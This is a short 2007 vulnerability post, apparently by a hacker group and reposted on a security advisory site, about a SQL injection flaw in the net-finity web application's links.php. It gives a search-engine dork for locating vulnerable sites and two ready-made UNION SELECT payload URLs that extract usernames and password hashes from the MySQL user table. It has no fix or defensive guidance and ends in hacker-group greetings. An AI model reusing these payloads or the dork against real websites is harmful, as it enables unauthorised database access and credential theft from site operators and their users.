Security Advisory: net-finity (links.php) Remote SQL Injection Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Sciurus Hosting Panel Code İnjection
  Myspace Clone Script (index.php) Remote File Inclusion Vulnerability
  Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability
  JiRos Upload Manager SQL Injection

From: verys-secret_(at)_hotmail.com <verys-secret_(at)_hotmail.com>
Date: 18.11.2007
Subject: net-finity (links.php) Remote SQL Injection Vulnerability

######################|S n I p E r - S A . C o m|###################
#                                                                  #
# SSSSS      NNN        NN   II PPPPPPP EEEEEEEEE   RRRRR       #
# SS          NN NN      NN   II PP    P EE          RR   RR     #
#S            NN NN     NN   II PP    P EE          RR     R    #
# SS          NN   NN    NN   II PPPPPPP EE          RR   RR     #
#   SSSS      NN    NN   NN   II PPP     EEEEEEE      RRRR         #
#        SS   NN     NN NN   II PP       EE          RRRR        #
#          S NN      NN NN   II PP       EE          RR RR      #
#        SS   NN        NNN   II PP       EE          RR   RR     #
#   SSSSS     NN        NNN   II PP       EEEEEEEEEE RR     RR   #
#                                                                  #
#####################|V e r Y - S e c R e T|########################
#found by : VerY-SecReT <---->[SnipEr's TeaM]                     #
####################################################################
#HomePage : WwW.SnIpEr-Sa.Com                                      #
############################################################################
#DorK: "Designed & Developed by net-finity" Or "inurl:links.php?link_id=" #
#################################################################################
########################################
#EX: http://localhost/links.php?link_id=-99%20union%20select%201,user,
password,4,5,6,7,8,9%20from%20mysql.user/*        #
# some web bug in
#EX: http://localhost/links.php?link_id=-99%20union%20select%201,2,3,4,
password,user,7,8,69,10,11%20from%20mysql.user/* #
#################################################################################
########################################
#S.GreetZ: sniper-sa.com & SnIpEr-Sa & Rafoo                       #
####################################################################
#ThanX To: ShoOt3r , 911 , 3badi , Devil-X , Mr.Max , Golden Hacker#
####################################################################
#Contact : SecReT@SecuRitY.Com.Sa & http://www.sniper-sa.com      #
####################################################################